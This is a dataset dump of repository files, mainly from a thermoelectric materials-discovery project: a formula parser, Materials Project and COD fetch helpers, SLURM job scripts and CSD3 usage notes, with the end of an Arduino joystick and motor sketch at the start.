\"\\tsw=\" + sw);\n if (x < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_LEFT;\n } else if (x > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_RIGHT;\n }\n if (y < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_UP;\n } else if (y > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_DOWN;\n }\n if (sw == 0) {\n status |= JOYSTICK_CLICK;\n }\n //Serial.println(String(\"\\tstatus=\") + status);\n return status;\n}\n\nvoid setup()\n{\n Serial.begin(19200);\n joystick_left_init();\n joystick_right_init();\n}\n\nvoid loop()\n{\n int left_joystick_status, right_joystick_status;\n left_joystick_status = joystick_left();\n right_joystick_status = joystick_right();\n delay(400);\n}\n"
},
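The joystick handling above maps two analog axes onto a direction bitmask with a dead zone near the extremes. The same idea restated in Python for quick desk-checking, using the constants from the sketch; axis orientation follows the left stick, and the switch is active-low because of `INPUT_PULLUP`:

```python
JOYSTICK_NONE, JOYSTICK_LEFT, JOYSTICK_RIGHT = 0x00, 0x01, 0x02
JOYSTICK_UP, JOYSTICK_DOWN, JOYSTICK_CLICK = 0x04, 0x08, 0x10
JOYSTICK_MIN, JOYSTICK_MAX, JOYSTICK_MARGIN = 0, 1023, 100

def left_stick_status(x, y, sw):
    """Map raw axis readings (0-1023) and switch state to a bitmask."""
    status = JOYSTICK_NONE
    if x < JOYSTICK_MIN + JOYSTICK_MARGIN:
        status |= JOYSTICK_DOWN
    elif x > JOYSTICK_MAX - JOYSTICK_MARGIN:
        status |= JOYSTICK_UP
    if y < JOYSTICK_MIN + JOYSTICK_MARGIN:
        status |= JOYSTICK_RIGHT
    elif y > JOYSTICK_MAX - JOYSTICK_MARGIN:
        status |= JOYSTICK_LEFT
    if sw == 0:  # switch reads 0 when pressed (pull-up)
        status |= JOYSTICK_CLICK
    return status

assert left_stick_status(1023, 512, 1) == JOYSTICK_UP
assert left_stick_status(0, 0, 0) == JOYSTICK_DOWN | JOYSTICK_RIGHT | JOYSTICK_CLICK
```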
{
"alpha_fraction": 0.6001838445663452,
"alphanum_fraction": 0.6378676295280457,
"avg_line_length": 22.65217399597168,
"blob_id": "9e1587f4a08ebcdd3f944c10eeecc60ebbe10c07",
"content_id": "a2f06c43dd4f68f2615a395c385816d57fb42ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1088,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 46,
"path": "/WifiCar/Motor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __MOTOR_H__\n#define __MOTOR_H__\n\n#include <Arduino.h>\n#include \"protocol.h\"\n\nconst int MOTOR_STATUS_STOP = 0x00;\nconst int MOTOR_STATUS_FORWARD = 0x01;\nconst int MOTOR_STATUS_LEFT = 0x02;\nconst int MOTOR_STATUS_RIGHT = 0x03;\nconst int MOTOR_STATUS_BACKWARD= 0x04;\n\nconst int MOTOR_LONG_EXECUTION_TIMER = 5000; // 5 seconds\nconst int MOTOR_SHORT_EXECUTION_TIMER = 500; // 0.5 seconds\nconst int MOTOR_HIGHEST_SPEED = 255;\nconst int MOTOR_LOWEST_SPEED = 128;\nconst int MOTOR_SPEED_STEP = 25;\n\nclass Motor\n{\nprivate:\n int enA, in1, in2, enB, in3, in4;\n int speed;\n int long_execution_timer;\n int short_execution_timer;\n unsigned long last_update;\n\npublic:\n int status;\n Motor(int _enA, int _in1, int _in2, int _enB, int _in3, int _in4);\n void init(void);\n void execute(int op_code);\n void idle(void);\n void forward(void);\n void backward(void);\n void turnleft(void);\n void turnright(void);\n void stop(void);\n void speedup(void);\n void speeddown(void);\n};\n\n#endif // __MOTOR_H__\n"
}
] | 73 |
leftshore1224/thermo | https://github.com/leftshore1224/thermo | 9ea3b0cd65ae7629b5790ed858a7e9dca3efb8b5 | 0202a47ec8abacfd49b065ddd13ad060b0b9a1a3 | f0784981a238efc1dbbde14e7249844d48309ae0 | refs/heads/main | 2023-08-18T06:17:49.456605 | 2021-10-17T09:06:58 | 2021-10-17T09:06:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6382978558540344,
"alphanum_fraction": 0.6464330554008484,
"avg_line_length": 28.054546356201172,
"blob_id": "79c660f0f44058fb2f7d2bdac400dd726fde986b",
"content_id": "33aac11e5b86f0b2c392ab1fee172889e061315e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 55,
"path": "/thermo/utils/atom_count.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "\"\"\"This module was adapted from https://codereview.stackexchange.com/questions/181191.\nPass the total_atom_count/flatten_formula functions a chemical formula to get the\ntotal number of atoms or the number of atoms for each element, respectively.\n\"\"\"\n\nimport re\nfrom collections import Counter\n\n\nRE = re.compile(\n r\"(?P<atom>[A-Z][a-z]*)(?P<atom_count>\\d*)|\"\n r\"(?P<new_group>\\()|\"\n r\"\\)(?P<group_count>\\d*)|\"\n r\"(?P<UNEXPECTED_CHARACTER_IN_FORMULA>.+)\"\n)\n\n\ndef atom_count(stack, atom, atom_count=\"\", **_):\n \"\"\"Handle an atom with an optional count, e.g. H or Mg2.\"\"\"\n stack[-1][atom] += 1 if atom_count == \"\" else int(atom_count)\n\n\ndef new_group(stack, **_):\n \"\"\"Handle an opening parenthesis.\"\"\"\n stack.append(Counter())\n\n\ndef group_count(stack, group_count=\"\", **_):\n \"\"\"Handle a closing parenthesis with an optional group count.\"\"\"\n group_count = 1 if group_count == \"\" else int(group_count)\n group = stack.pop()\n for atom in group:\n group[atom] *= group_count\n stack[-1] += group\n\n\ndef formula_to_dict(formula):\n \"\"\"Generate a stack of formula transformations with successively unpacked\n groups and return the last one.\"\"\"\n stack = []\n new_group(stack)\n for match in RE.finditer(formula):\n globals()[match.lastgroup](stack, **match.groupdict())\n return stack[-1]\n\n\ndef flatten_formula(formula):\n d = formula_to_dict(formula)\n return \"\".join(\n atom + (str(count) if count > 1 else \"\") for atom, count in sorted(d.items())\n )\n\n\ndef total_atom_count(formula):\n return sum(formula_to_dict(formula).values())\n"
},
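Illustrative use of the two helpers exposed by the `atom_count.py` entry above; the expected outputs follow directly from the module's regex and `Counter` logic, and the import path assumes the repo is importable as the `thermo` package:

```python
from thermo.utils.atom_count import flatten_formula, total_atom_count

print(flatten_formula("Ca(OH)2"))   # CaH2O2 -- group unpacked, atoms sorted
print(total_atom_count("Ca(OH)2"))  # 5
print(total_atom_count("Bi2Te3"))   # 5
```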
{
"alpha_fraction": 0.7962962985038757,
"alphanum_fraction": 0.7962962985038757,
"avg_line_length": 53,
"blob_id": "4441fd0b3b32cc1a71c3fcdf2bf3fd10b50c193b",
"content_id": "2581453035979b34f5be7ac37742dea9ae593635",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 3,
"path": "/thermo/data/__init__.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "from .fetch import fetch_cod, fetch_mp\nfrom .load import load_gaultois, load_screen\nfrom .transform import dropna, normalize, train_test_split, transform_df_cols\n"
},
{
"alpha_fraction": 0.5604490637779236,
"alphanum_fraction": 0.5903281569480896,
"avg_line_length": 33.05882263183594,
"blob_id": "622f24676ec2f22c0d2cf02b27a3a0279c0b0757",
"content_id": "0e0983e8db5a363c64a60f02072c7745e9b815aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5790,
"license_type": "permissive",
"max_line_length": 305,
"num_lines": 170,
"path": "/hpc/readme.md",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "# CSD3 Guide\n\n## Submissions Scripts\n\nTo submit a CPU or GPU job, use `sbatch hpc/(c|g)pu_submit` after editing those files (if necessary). Rather than changing parameters directly in those files, you can pass in variables via the command line as follows:\n\n```sh\nsbatch --export var1='foo',var2='bar' hpc/(c|g)pu_submit\n```\n\nand then using those variables as e.g.\n\n```sh\necho var1 is '$var1' and var2 is '$var1'\n```\n\nTo change the job name and run time, use `sbatch -J job_name -t 1:0:0` (time format `h:m:s`). A complete example would be\n\n```sh\nsbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/gpu_submit\n```\n\n## Array Jobs\n\nTo submit an array of, say 16 jobs, use\n\n```sh\nsbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/gpu_submit\n```\n\nNote the backslash in front of `\\$SLURM_ARRAY_TASK_ID` which ensures the variable isn't expanded at job submission time but at execution time where it will have a value.\n\nYou may also read the task ID directly in the Python script via\n\n```py\ntask_id = int(sys.argv[1])\n```\n\nThis can for instance be used to run a grid of experiments:\n\n```py\ntask_id = int(sys.argv[1])\n\ndrop_rates, learning_rates = [0.1, 0.2, 0.3, 0.5], [1e-4, 3e-4, 1e-3, 3e-3]\ndrop_rate, learning_rate = tuple(itertools.product(drop_rates, learning_rates))[task_id]\n```\n\n## Environment\n\nTo setup dependencies, use `conda`\n\n```sh\nconda create -n py38 python\npip install -r requirements.txt\n```\n\n## Running Short Experiments\n\nShort interactive sessions are a good way to ensure a long job submitted via `(c|g)pu_submit` will run without errors in the actual HPC environment.\n\n[To request a 10-minute interactive CPU session](https://docs.hpc.cam.ac.uk/hpc/user-guide/interactive.html#sintr):\n\n```sh\nsintr -A LEE-SL3-CPU -p skylake -N2 -n2 -t 0:10:0 --qos=INTR\nmodule load rhel7/default-peta4\nscript job_name.log\n```\n\n- `sintr`: SLURM interactive\n- `-A LEE-SL3-CPU`: charge the session to account `LEE-SL3-CPU`\n- `-p skylake`: run on the Skylake partition\n- `-N1 -n1`: use single node\n- `-t 0:10:0` set session duration to 10 min\n- `--qos=INTR`: set quality of service to interactive\n\nTo request two nodes for an hour (the maximum interactive session duration), use\n\n```sh\nsintr -A LEE-SL3-CPU -p skylake -N2 -n2 -t 1:0:0 --qos=INTR\n```\n\nUseful for testing a job will run successfully in the actual environment it's going to run in without having to queue much.\n\nThe last line `script job_name.log` is optional but useful as it ensures everything printed to the terminal during the interactive session will be recorded in `job_name.log`. [See `script` docs](https://man7.org/linux/man-pages/man1/script.1.html).\n\nTo use service level 2, include your CRSId, i.e. 
`LEE-JR769-SL2-CPU` instead of `LEE-SL3-CPU`.\n\nSimilarly, for a 10-minute interactive GPU session:\n\n```sh\nsintr -A LEE-SL3-GPU -p ampere,pascal -N1 -n1 -t 0:10:0 --qos=INTR --gres=gpu:1\nmodule load rhel7/default-gpu\nscript job_name.log\n```\n\nBefore doing anything, that requires a GPU, remember to load\n\n```sh\nmodule load rhel7/default-gpu\n```\n\nTo specify CUDA version:\n\n```sh\nmodule load cuda/11.0\n```\n\nCheck current version with `nvcc --version`.\n\nTo check available hardware:\n\n```sh\nnvidia-smi\n```\n\nThis should print something like\n\n```text\nThu Oct 8 20:15:44 2020\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.51.06 Driver Version: 450.51.06 CUDA Version: 11.0 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 Tesla P100-PCIE... On | 00000000:04:00.0 Off | 0 |\n| N/A 35C P0 28W / 250W | 0MiB / 16280MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n```\n\n## Debugging Tips\n\nIf the interactive window won't launch over SSH, see [vscode-python#12560](https://github.com/microsoft/vscode-python/issues/12560).\n\nIf VS Code fails to connect to a remote (encountered once with exitCode 24), follow the steps to [clean up VS Code Server on the remote](https://code.visualstudio.com/docs/remote/troubleshooting#_cleaning-up-the-vs-code-server-on-the-remote) followed by reconnecting which reinstalls the remote extension.\n\n## Syncing Results\n\nTo sync results back from CSD3 to your local machine, use\n\n```sh\nrsync -av --delete login.hpc.cam.ac.uk:repo/results .\n```\n\n`-a`: archive mode, `-v`: increase verbosity, `--delete`: remove files from target not found in source.\n\nIf CSD3 was setup as an SSH alias in `~/.ssh/config`,\n\n```text\nHost csd3\n Hostname login.hpc.cam.ac.uk\n```\n\nThen it's simply:\n\n```sh\nrsync -av --delete csd3:repo/results .\n```\n\nAdd `-n` to test the command in a dry-run first. Will list each action that would have been performed.\n"
},
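A runnable version of the grid-indexing pattern shown in the readme above: one SLURM array task ID selects one `(drop_rate, learning_rate)` pair out of the 4×4 grid, matching `--array 0-15`. The invocation is assumed to be `python script.py $SLURM_ARRAY_TASK_ID`, as in the submission scripts:

```python
import itertools
import sys

task_id = int(sys.argv[1])  # SLURM_ARRAY_TASK_ID passed as first CLI argument

drop_rates = [0.1, 0.2, 0.3, 0.5]
learning_rates = [1e-4, 3e-4, 1e-3, 3e-3]
grid = list(itertools.product(drop_rates, learning_rates))  # 16 combinations

drop_rate, learning_rate = grid[task_id]
print(f"task {task_id}: drop_rate={drop_rate}, learning_rate={learning_rate}")
```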
{
"alpha_fraction": 0.6717284321784973,
"alphanum_fraction": 0.6913800835609436,
"avg_line_length": 39.70909118652344,
"blob_id": "64abcb12e8c4c5c0070f3753ff669d9dc8d7cb91",
"content_id": "efa24573068e5307a60a237d91565817340cc948",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2239,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 55,
"path": "/hpc/gpu_submit",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#! SLURM job script for Wilkes2 (Broadwell, ConnectX-4, P100)\n#! Last updated: Mon 13 Nov 12:06:57 GMT 2017\n#! https://docs.hpc.cam.ac.uk/hpc/user-guide/batch.html#sample-submission-scripts\n\n#! Which project should be charged (NB Wilkes2 projects end in '-GPU'):\n#SBATCH -A LEE-JR769-SL2-GPU\n\n#! How many whole nodes should be allocated?\n#SBATCH --nodes=1\n\n#! Specify the number of GPUs per node (between 1 and 4; must be 4 if nodes>1).\n#! Note: Charging is determined by GPU number * walltime.\n#SBATCH --gres=gpu:1\n\n#! How many (MPI) tasks will there be in total?\n#! This should probably not exceed the total number of GPUs in use.\n#SBATCH --ntasks=1\n\n#! What types of email messages to receive. Valid values include\n#! NONE, BEGIN, END, FAIL, REQUEUE, ALL. See https://slurm.schedmd.com/sbatch.html.\n#SBATCH --mail-type=FAIL\n\n#! Where to write standard out and standard error from this job. Can be the same file.\n#SBATCH --output=slurm-%x-%j.out\n\n#! The partition to use (do not change):\n#SBATCH -p ampere,pascal\n\n#! ------ sbatch directives end (put additional directives above this line)\n\n#! Modify the settings below to specify the job's environment, location and launch method.\n#! (SLURM reproduces the environment at submission irrespective of ~/.bashrc):\n. /etc/profile.d/modules.sh # Leave this line (enables the module command)\nmodule purge # Removes all modules still loaded\nmodule load rhel7/default-gpu # REQUIRED - loads the basic environment\n\n#! --- Single Job ---\n#! sbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/gpu_submit\n\n# --- Array Job ---\n#! sbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/gpu_submit\n#! or read the task id directly in the Python script via: task_id = int(sys.argv[1])\n\ncd $SLURM_SUBMIT_DIR\n\necho -e \"Job ID: $SLURM_JOB_ID\\nJob name: $SLURM_JOB_NAME\\n\"\necho \"Time: `date`\"\necho \"Running on master node: `hostname`\"\necho \"Current directory: `pwd`\"\necho -e \"\\nNodes allocated: num_tasks=$SLURM_NTASKS, num_nodes=$SLURM_JOB_NUM_NODES\"\necho -e \"\\nExecuting command:\\n$CMD\\n\\n==================\\n\"\n\neval $CMD\n"
},
{
"alpha_fraction": 0.8727272748947144,
"alphanum_fraction": 0.8727272748947144,
"avg_line_length": 9.3125,
"blob_id": "51d2199da67491785aba6826963b9bcaff36ea3a",
"content_id": "a06a965cfa9beba1f814d8b2a930032c19e99e32",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 165,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 16,
"path": "/requirements.txt",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "automatminer\ngurobipy\nmatminer\nmatplotlib\nml-matrics\nnumpy\npandas\nscikit-learn\nscikit-optimize\nscipy\nseaborn\ntensorflow\ntensorflow-probability\ntorch\ntqdm\numap-learn\n"
},
{
"alpha_fraction": 0.7675291299819946,
"alphanum_fraction": 0.7704917788505554,
"avg_line_length": 66.50666809082031,
"blob_id": "7d625dcf5a5d6e0e8d535b2616c14138f7c43457",
"content_id": "c0949a38e5bb826622b5fd6710de6b89c72dcb89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5063,
"license_type": "permissive",
"max_line_length": 786,
"num_lines": 75,
"path": "/readme.md",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "# Data-Driven Risk-Conscious Thermoelectric Materials Discovery\n\n[](/license)\n[](https://github.com/janosh/thermo/graphs/contributors)\n[](https://github.com/janosh/thermo/commits)\n[](https://results.pre-commit.ci/latest/github/janosh/thermo/main)\n\n## Project description\n\nThe aim is to discover high figure of merit (_zT_ > 1) and sustainable (lead-free and rare earth-free) bulk thermoelectrics using machine learning-guided experimentation. The key advance is going beyond 'big data' which in this domain is unattainable for the foreseeable future since both first principles calculations and experimental synthesis and characterization of bulk thermoelectrics are costly and low throughput. Instead, we move towards so-called 'optimal data' by developing novel algorithms that optimize thermoelectric performance (_zT_) with minimal number of expensive calculations and experiments.\n\nTo date there has been no statistically robust approach to simultaneously incorporate experimental and model error into machine learning models in a search space with high opportunity cost and high latency (i.e. large time between prediction and validation).\n\nConsequently, searches have been unable to effectively guide experimentalists in the selection of exploring or exploiting new materials when the validation step is inherently low throughput and resource-intensive, as is the case for synthesizing new bulk functional materials like thermoelectrics. This project aims to implement a holistic pipeline to discover novel thermoelectrics: ML models predict the _zT_ of a large database of structures as well as their own uncertainty for each prediction. Candidate structures are then selected, based on maximizing _zT_ subject to a tolerable level of uncertainty, to proceed to the next stage where expensive experimental synthesis and characterization of high-_zT_ candidates are guided by Bayesian optimization and active machine learning.\n\n## Setup\n\nTo check out the code in this repo, reproduce results and start contributing to the project, clone the repo and create a `conda` environment containing all dependencies by running the following command (assumes you have `git` and `conda` installed)\n\n```sh\ngit clone https://github.com/janosh/thermo \\\n&& cd thermo \\\n&& pip install -r requirements.txt\n&& pre-commit install\n```\n\n## Usage\n\n### Locally\n\nRun any of the files in [`src/notebooks`](https://github.com/janosh/thermo/tree/main/notebooks). The recommended way to work with those files is using [VS Code](https://code.visualstudio.com) and its [Python extension](https://marketplace.visualstudio.com/items?itemName=ms-python.python). You'll see the results of running those files [in an interactive window](https://code.visualstudio.com/docs/python/jupyter-support-py) (similar to Jupyter).\n\nYou'll probably want to add the following VS Code settings for local module imports to work and for code changes in imported modules to be auto-reloaded into the interactive session:\n\n```json\n\"python.dataScience.runStartupCommands\": [\n \"%load_ext autoreload\",\n \"%autoreload 2\",\n \"import sys\",\n \"sys.path.append('${workspaceFolder}')\",\n \"sys.path.append('${workspaceFolder}/src')\",\n],\n```\n\n### HPC\n\nTo submit a job to [Cambridge University's CSD3](https://hpc.cam.ac.uk) HPC facility ([docs](https://docs.hpc.cam.ac.uk/hpc)):\n\n1. 
Connect via `ssh` using your [CRSid](https://help.uis.cam.ac.uk/new-starters/it-for-students/student-it-services/your-crsid) and password, e.g.\n\n ```sh\n ssh [email protected]\n ```\n\n2. Copy over the directory using `rsync`\n\n ```sh\n rsync -av --delete --include-from=hpc/rsync.include . [email protected]:thermoelectrics\n ```\n\n See `hpc/rsync.include` for a list of files that will be transferred to your CSD3 home directory. You can also simulate this command before executing it with the `--dry-run` option.\n\n3. To submit a single HPC job, enter\n\n ```sh\n sbatch hpc/gpu_submit\n ```\n\n For a job array, first modify the GPU submission script at `./hpc/gpu-submit` and make sure in the section `#! Run options for the application:` you comment out the line below `# single job` and uncomment the line `# array job`. Then again issue the `sbatch` command, this time including the `--array` option. E.g. to submit 16 jobs at once, use\n\n ```sh\n sbatch --array=0-15 hpc/gpu_submit\n ```\n\nFor a more user-friendly experience, you can also [request cluster resources through Jupyter](https://docs.hpc.cam.ac.uk/hpc/software-packages/jupyter.html) by first instantiating a notebook server and then specifying that as a [remote server in VS Code's interactive window](https://code.visualstudio.com/docs/python/jupyter-support#_connect-to-a-remote-jupyter-server).\n"
},
{
"alpha_fraction": 0.6778091192245483,
"alphanum_fraction": 0.6975433230400085,
"avg_line_length": 42.561405181884766,
"blob_id": "8ded289f6b807517867f4455b7b2b12c2b0a4048",
"content_id": "297b13e267153364549d184ae4559ecfd80adbc1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2483,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 57,
"path": "/hpc/cpu_submit",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#!\n#! SLURM job script for Peta4-Skylake (Skylake CPUs, OPA)\n#! Last updated: Mon 13 Nov 12:25:17 GMT 2017\n#! https://docs.hpc.cam.ac.uk/hpc/user-guide/batch.html#sample-submission-scripts\n\n#! Which project should be charged:\n#SBATCH -A LEE-SL3-CPU\n\n#! How many whole nodes should be allocated?\n#! Note: Charging is determined by core number * walltime.\n#SBATCH --nodes=1\n\n#! How many (MPI) tasks will there be in total? (<= nodes*32)\n#! The skylake/skylake-himem nodes have 32 CPUs (cores) each.\n#! Each task is allocated 1 core by default, and each core is allocated 5990MB (skylake)\n#! and 12040MB (skylake-himem). If this is insufficient, also specify\n#! --cpus-per-task and/or --mem (the latter specifies MB per node).\n#SBATCH --ntasks=1\n\n#! What types of email messages to receive. Valid values include\n#! NONE, BEGIN, END, FAIL, REQUEUE, ALL. See https://slurm.schedmd.com/sbatch.html.\n#SBATCH --mail-type=FAIL\n\n#! The partition to use\n#! For 6GB per CPU, set \"-p skylake\"; for 12GB per CPU, set \"-p skylake-himem\":\n#SBATCH -p skylake,skylake-himem,cclake\n\n#! Where to write standard out and standard error from this job. Can be the same file.\n#SBATCH --output=slurm-%x-%j.out\n\n#! ------ sbatch directives end here (put additional directives above this line)\n\n#! Modify the settings below to specify the job's environment, location and launch method.\n#! Optionally modify the environment seen by the application\n#! (note that SLURM reproduces the environment at submission irrespective of ~/.bashrc):\n. /etc/profile.d/modules.sh # Leave this line (enables the module command)\nmodule purge # Removes all modules still loaded\nmodule load rhel7/default-peta4 # REQUIRED - loads the basic environment\n\n#! --- Single Job ---\n#! sbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/cpu_submit\n\n# --- Array Job ---\n#! sbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/cpu_submit\n#! or read the task id directly in the Python script via: task_id = int(sys.argv[1])\n\ncd $SLURM_SUBMIT_DIR\n\necho -e \"Job ID: $SLURM_JOB_ID\\nJob name: $SLURM_JOB_NAME\\n\"\necho \"Time: `date`\"\necho \"Running on master node: `hostname`\"\necho \"Current directory: `pwd`\"\necho -e \"\\nNodes allocated: num_tasks=$SLURM_NTASKS, num_nodes=$SLURM_JOB_NUM_NODES\"\necho -e \"\\nExecuting command:\\n$CMD\\n\\n==================\\n\"\n\neval $CMD\n"
},
{
"alpha_fraction": 0.6588991284370422,
"alphanum_fraction": 0.6621133089065552,
"avg_line_length": 36.712120056152344,
"blob_id": "f92b0ce63722873a2c1da0925ff9f7601969270e",
"content_id": "dd860d1a92aeebd299f7b399b4dd9d8a9970efe6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2489,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 66,
"path": "/thermo/data/fetch.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom pymatgen import MPRester\nfrom pymatgen.ext.cod import COD\n\nfrom thermo.utils import ROOT\n\n\ndef fetch_mp(criteria={}, properties=[], save_to=None):\n \"\"\"Fetch data from the Materials Project (MP).\n Docs at https://docs.materialsproject.org.\n Pymatgen MP source at https://pymatgen.org/_modules/pymatgen/ext/matproj.\n\n Note: Unlike ICSD - a database of materials that actually exist - MP has\n all structures where DFT+U converges. Those can be thermodynamically\n unstable if they lie above the convex hull. Set criteria = {\"e_above_hull\": 0}\n to get stable materials only.\n\n Args:\n criteria (dict, optional): filter criteria which returned items must\n satisfy, e.g. criteria = {\"material_id\": {\"$in\": [\"mp-7988\", \"mp-69\"]}}.\n Supports all features of the Mongo query syntax.\n properties (list, optional): quantities of interest, can be selected from\n https://materialsproject.org/docs/api#resources_1 or\n MPRester().supported_properties.\n save_to (str, optional): Pass a file path to save the data returned by MP\n API as CSV. Defaults to None.\n\n Returns:\n df: pandas DataFrame with a column for each requested property\n \"\"\"\n\n properties = list({*properties, \"material_id\"}) # use set to remove dupes\n\n # MPRester connects to the Material Project REST interface.\n # API keys available at https://materialsproject.org/dashboard.\n with MPRester() as mp:\n # mp.query performs the actual API call.\n data = mp.query(criteria, properties)\n\n if data:\n df = pd.DataFrame(data)[properties] # ensure same column order as in properties\n\n df = df.set_index(\"material_id\")\n\n if save_to:\n data.to_csv(ROOT + save_to, float_format=\"%g\")\n\n return df\n else:\n raise ValueError(\"query returned no data\")\n\n\ndef fetch_cod(formulas=None, ids=None, get_ids_for=None):\n \"\"\"Fetch data from the Crystallography Open Database (COD).\n Docs at https://pymatgen.org/pymatgen.ext.cod.\n Needs the mysql binary to be in path to run queries. Installable\n via `brew install mysql`.\n \"\"\"\n cod = COD()\n if formulas:\n return [cod.get_structure_by_formula(f) for f in formulas]\n if ids:\n return [cod.get_structure_by_id(i) for i in ids]\n if get_ids_for:\n return [cod.get_cod_ids(i) for i in get_ids_for]\n raise ValueError(\"fetch_cod() requires formulas or ids.\")\n"
}
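A hypothetical call into `fetch_mp` above, pulling stable materials only via the `{"e_above_hull": 0}` criterion its docstring suggests. It requires an MP API key configured for pymatgen's `MPRester`; the `nelements` criterion and the `pretty_formula`/`band_gap` property names are standard legacy MP query fields used here as assumptions, not code from the repo:

```python
from thermo.data import fetch_mp  # re-exported in thermo/data/__init__.py

df = fetch_mp(
    criteria={"e_above_hull": 0, "nelements": 2},
    properties=["pretty_formula", "band_gap"],
)
print(df.head())  # DataFrame indexed by material_id
```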
] | 8 |
elianmarks/utf8-debug | https://github.com/elianmarks/utf8-debug | 049928541c3802472de3f82f18149bdc72c6e2b7 | b19c8b7ee326beb2d16737397cc2654700110e72 | 5ff0cc56d1957232bca68c3c82c56dc1c0fa6bec | refs/heads/master | 2020-04-29T06:02:22.420817 | 2019-03-15T23:17:26 | 2019-03-15T23:17:26 | 175,903,083 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.39370712637901306,
"alphanum_fraction": 0.4134731888771057,
"avg_line_length": 37.13846206665039,
"blob_id": "5aaba1c2240f1fa31810adb8db8681c8ce3e5057",
"content_id": "07c7f2f8bb5ff51589d4b0bffb846be9eae124f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3175,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 65,
"path": "/utf8-debug.py",
"repo_name": "elianmarks/utf8-debug",
"src_encoding": "UTF-8",
